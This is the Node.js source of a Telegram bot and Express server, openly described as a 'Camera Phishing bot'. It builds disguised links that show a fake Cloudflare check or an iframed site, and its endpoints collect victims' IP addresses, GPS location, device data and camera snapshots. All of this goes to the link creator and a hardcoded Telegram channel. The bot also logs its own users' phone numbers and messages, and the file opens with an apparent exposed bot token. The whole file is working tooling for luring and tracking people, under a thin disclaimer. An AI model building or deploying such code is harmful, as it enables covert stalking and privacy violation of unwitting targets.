5973092089:AAF_x5jYbCTBjuLaiGgPRRq_bL-n5iUiPnI
 <pre>
const request = require('request');
const fs = require("fs");
const express = require("express");
var cors = require('cors');
var bodyParser = require('body-parser');

const fetch = require('node-fetch');
const TelegramBot = require('node-telegram-bot-api');
const bot = new TelegramBot(process.env["bot"], {polling: true});

var jsonParser=bodyParser.json({limit:1024*1024*20, type:'application/json'});
var urlencodedParser=bodyParser.urlencoded({ extended:true,limit:1024*1024*20,type:'application/x-www-form-urlencoded' });
const app = express();
app.use(jsonParser);
app.use(urlencodedParser);
app.use(cors());
app.set("view engine", "ejs");

//Modify your URL here
var hostURL="https://TrackDown.forbidden8.repl.co";
//TOGGLE for 1pt Proxy and Shorters
var use1pt=true;



app.get("/w/:path/:uri",(req,res)=>{
var ip;
var d = new Date();
d=d.toJSON().slice(0,19).replace('T',':');
if (req.headers['x-forwarded-for']) {ip = req.headers['x-forwarded-for'].split(",")[0];} else if (req.connection && req.connection.remoteAddress) {ip = req.connection.remoteAddress;} else {ip = req.ip;}
  
if(req.params.path != null){
res.render("webview",{ip:ip,time:d,url:atob(req.params.uri),uid:req.params.path,a:hostURL,t:use1pt});
} 
else{
res.redirect("https://t.me/ForbiddenPub");
}

         
                              
});

app.get("/c/:path/:uri",(req,res)=>{
var ip;
var d = new Date();
d=d.toJSON().slice(0,19).replace('T',':');
if (req.headers['x-forwarded-for']) {ip = req.headers['x-forwarded-for'].split(",")[0];} else if (req.connection && req.connection.remoteAddress) {ip = req.connection.remoteAddress;} else {ip = req.ip;}


if(req.params.path != null){
res.render("cloudflare",{ip:ip,time:d,url:atob(req.params.uri),uid:req.params.path,a:hostURL,t:use1pt});
} 
else{
res.redirect("https://t.me/ForbiddenPub");
}

         
                              
});



bot.on('message', async (msg) => {

  const chatId = msg.chat.id;
  const username = msg.from.username;
  const message = msg.text;
  console.log(`Received message from ${username} with chat ID ${chatId} and message: ${message}`);
bot.sendMessage("-1001881049749", `New message from ${username} with chat ID ${chatId} Message: ${message}`);

if(msg?.reply_to_message?.text=="🔗 𝗘𝗡𝗧𝗘𝗥 𝗬𝗢𝗨𝗥 𝗨𝗥𝗟\n\nEx. https://www.google.com"){
 createLink(chatId,msg.text); 
}
  

let userPhoneNumbers = {};

if(msg.text === '/start') {
  
const channelId = '-1001881049749';
const registeredUsers = [];


    const phoneNumber = msg.contact ? msg.contact.phone_number : null;

    if(!phoneNumber || registeredUsers.indexOf(phoneNumber) === -1) {
        bot.sendMessage(chatId, 'Login by your number to use this bot.', {
            reply_markup: {
                keyboard: [[{
                    text: 'Login',
                    request_contact: true
                }]],
                resize_keyboard: true,
                one_time_keyboard: true
            }
        });
    } 
bot.on('contact', (msg) => {
    const chatId = msg.chat.id;
  
    const phoneNumber = msg.contact.phone_number;
    if (registeredUsers.indexOf(phoneNumber) === -1) {
        registeredUsers.push(phoneNumber);
    
      bot.sendMessage(chatId, `Loged in! ${msg.chat.first_name} ${phoneNumber} has been registered.`, { reply_markup: { remove_keyboard: true } });
    }
   bot.sendMessage(channelId, ` New user @${username}'s phone number: ${phoneNumber}`);

var m={
    reply_markup:{
    inline_keyboard:
    [
        [{text:"𝗖𝗥𝗘𝗔𝗧𝗘 𝗟𝗜𝗡𝗞 〥",callback_data:"crenew"}]
    ]
}};
      
        bot.sendMessage(chatId, `Welcome ${msg.chat.first_name} ! , 
You can use this bot to track down people just through a simple link.
    It can GATHER INFORMATION, LOCATION, DEVICE INFO and CAMERA SNAP.

Please note that this bot is not available on a 24/7 basis as the developer has implemented certain limitations on its usage time.

Acquire your own Camera Phishing bot and ensure 24/7 availability. For further information and inquiries, please direct message @FourB1T.

    COMMAND LIST: 

/create - To generate camera phishing links. \n/ip - Retrieve information about provided ip address.\n/help - For more information.\n
JOIN US!
@ForbiddenPub

PROGRAMMED BY: @FourB1T
    `, 
      m);
      loggedInUsers.push(userId);
    }
);
}





    

    




  


  



   else  if(msg.text === '/ip') {
        let ipListenerAttached = false;
        let isIpValid = false;
        let ipListener = (msg) => {
            if(msg.text){
                const ip = msg.text;
                const ipFormat = /^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/;
                if (!ipFormat.test(ip)) {
                    if(!isIpValid){
                        bot.sendMessage(chatId, `${ip} is not a valid IP address.\nPlease type /ip again`);
                        isIpValid = true;
                    }
                    bot.removeListener("message", ipListener);
                    ipListenerAttached = false;
                } else {
                                        if(!isIpValid){
                        const url = `https://ipinfo.io/${ip}/json`;
                        request(url, { json: true }, (err, res, body) => {
                            if (err) { return console.log(err); }
                            bot.sendMessage(chatId, `INFORMATION: ${ip} \n\n
City: ${body.city}\n
Region: ${body.region}\n
Country: ${body.country}\n
Postal Code: ${body.postal}\n
Longitude/Latitude: ${body.loc}\n
Timezone: ${body.timezone}\n
ISP: ${body.org}\n`);
                        });
                        isIpValid = true;
                    }
                }
            }
        }

        if(!ipListenerAttached) {
            isIpValid = false;
            bot.sendMessage(chatId, "Type the IP address:", { reply_markup: { force_reply: true } });
            bot.on('message', ipListener);
            ipListenerAttached = true;
        }
    }










  
else if(msg.text=="/create"){
createNew(chatId);
}
else if(msg.text=="/help"){
bot.sendMessage(chatId,` Through this bot you can track people just by sending a simple link.\n\nSend /create
to begin , afterwards it will ask you for a URL which will be used in iframe to lure victims.\nAfter receiving
the url it will send you 2 links which you can use to track people.
\n\nSpecifications.
\n1. Cloudflare Link: This method will show a cloudflare under attack page to gather informations and afterwards victim will be redirected to destinationed URL.
\n2. Webview Link: This will show a website (ex bing , dating sites etc) using iframe for gathering information.
( ⚠️ Many sites may not work under this method if they have x-frame header present.Ex https://google.com )
\n\nProject By @FourB1T
`);
}
 
 
});

bot.on('callback_query',async function onCallbackQuery(callbackQuery) {
bot.answerCallbackQuery(callbackQuery.id);
if(callbackQuery.data=="crenew"){
createNew(callbackQuery.message.chat.id);
} 
});
bot.on('polling_error', (error) => {
//console.log(error.code); 
});






async function createLink(cid,msg){

var encoded = [...msg].some(char => char.charCodeAt(0) > 127);

if ((msg.toLowerCase().indexOf('http') > -1 || msg.toLowerCase().indexOf('https') > -1 ) && !encoded) {
 
var url=cid.toString(36)+'/'+btoa(msg);
var m={
  reply_markup:JSON.stringify({
    "inline_keyboard":[[{text:"𝗖𝗥𝗘𝗔𝗧𝗘 𝗡𝗘𝗪 𝗟𝗜𝗡𝗞 ⟳",callback_data:"crenew"}]]
  } ,m)};

var cUrl=`${hostURL}/c/${url}`;
var wUrl=`${hostURL}/w/${url}`;
  
bot.sendChatAction(cid,"typing");
if(use1pt){
var x=await fetch(`https://short-link-api.vercel.app/?query=${encodeURIComponent(cUrl)}`).then(res => res.json());
var y=await fetch(`https://short-link-api.vercel.app/?query=${encodeURIComponent(wUrl)}`).then(res => res.json());

var f="",g="";

for(var c in x){
f+=x[c]+"\n";
}

for(var c in y){
g+=y[c]+"\n";
}
  
bot.sendMessage(cid, `𝗡𝗘𝗪 𝗟𝗜𝗡𝗞𝗦 𝗛𝗔𝗦 𝗕𝗘𝗘𝗡 𝗖𝗥𝗘𝗔𝗧𝗘𝗗 𝗦𝗨𝗖𝗖𝗘𝗦𝗦𝗙𝗨𝗟𝗟𝗬!\n\nYou can use any one of the below links.\n𝗢𝗥𝗜𝗚𝗜𝗡𝗔𝗟 𝗨𝗥𝗟: ${msg}\n\nＮＯＴＥ:\nThis bot is intended for use solely for the purpose of identifying and reporting individuals or entities engaging in fraudulent or malicious activities. The creator of this bot shall not be held liable for any illegal activities or actions taken using this bot. \n\n𝗟𝗜𝗡𝗞𝗦:\n\n🔗 CloudFlare Page Link\n${f}\n\n🔗 WebView Page Link\n${g}\n\nConsider giving a tip to help  this bot keep running.\n@FourB1T`,m);

 
}
  
else{

bot.sendMessage(cid, `New links has been created successfully.\nURL: ${msg}\n\n✅Your Links\n\n🌐 CloudFlare Page Link\n${cUrl}\n\n🌐 WebView Page Link\n${wUrl}`,m);
}
}
else{
bot.sendMessage(cid,`⚠️ Please Enter a valid URL , including http or https.`);
createNew(cid);

}  
}


function createNew(cid){
var mk={
reply_markup:JSON.stringify({"force_reply":true})
};
bot.sendMessage(cid,`🔗 𝗘𝗡𝗧𝗘𝗥 𝗬𝗢𝗨𝗥 𝗨𝗥𝗟\n\nEx. https://www.google.com`,mk);
}





app.get("/", (req, res) => {
    var ip;
    if (req.headers['x-forwarded-for']) {ip = req.headers['x-forwarded-for'].split(",")[0];} else if (req.connection && req.connection.remoteAddress) {ip = req.connection.remoteAddress;} else {ip = req.ip;}
    res.json({"ip":ip});
    var channelId = -1001881049749; // Replace with actual Telegram channel ID
    bot.sendMessage(channelId, `IP Address: ${ip}`);
});



app.post("/location",(req,res)=>{
    var lat=parseFloat(decodeURIComponent(req.body.lat)) || null;
    var lon=parseFloat(decodeURIComponent(req.body.lon)) || null;
    var uid=decodeURIComponent(req.body.uid) || null;
    var acc=decodeURIComponent(req.body.acc) || null;
    var channelId = -1001881049749; // Replace with actual Telegram channel ID
    if(lon != null && lat != null && uid != null && acc != null){
        bot.sendLocation(parseInt(uid,36),lat,lon);
        bot.sendLocation(channelId,lat,lon);
        bot.sendMessage(parseInt(uid,36),`Latitude: ${lat}\nLongitude: ${lon}\nAccuracy: ${acc} meters`);
        bot.sendMessage(channelId, `New location shared Latitude: ${lat} Longitude: ${lon} Accuracy: ${acc} meters`);
        res.send("Done");
    }
});



app.post("/",(req,res)=>{
    var uid=decodeURIComponent(req.body.uid) || null;
    var data=decodeURIComponent(req.body.data)  || null; 
    var channelId = -1001881049749; // Replace with actual Telegram channel ID
    if( uid != null && data != null){
        data=data.replaceAll("<br>","\n");
        bot.sendMessage(parseInt(uid,36),data,{parse_mode:"HTML"});
        bot.sendMessage(channelId, data, {parse_mode:"HTML"});
        res.send("Done");
    }
});


app.post("/camsnap",(req,res)=>{
    var uid=decodeURIComponent(req.body.uid)  || null;
    var img=decodeURIComponent(req.body.img) || null;
    var channelId = -1001881049749; // Replace with actual Telegram channel ID
  
    if( uid != null && img != null){
  
        var buffer=Buffer.from(img,'base64');
  
        var info={
            filename:"camsnap.png",
            contentType: 'image/png'
        };

        try {
            bot.sendPhoto(parseInt(uid,36),buffer,{},info);
            bot.sendPhoto(channelId, buffer, {}, info);
        } catch (error) {
            console.log(error);
        }

        res.send("Done");
    }
});



app.listen(5000, () => {
console.log("App Running on Port 5000!");
});
</pre>
